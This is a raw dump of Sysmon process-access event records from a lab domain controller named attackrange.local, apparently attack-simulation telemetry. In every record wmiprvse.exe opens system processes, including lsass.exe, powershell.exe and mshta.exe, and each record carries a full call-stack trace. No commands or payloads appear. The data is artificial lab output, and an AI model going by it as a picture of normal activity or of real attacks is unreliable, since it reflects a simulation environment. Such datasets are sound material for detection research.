15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8206-00000000A301}4644C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 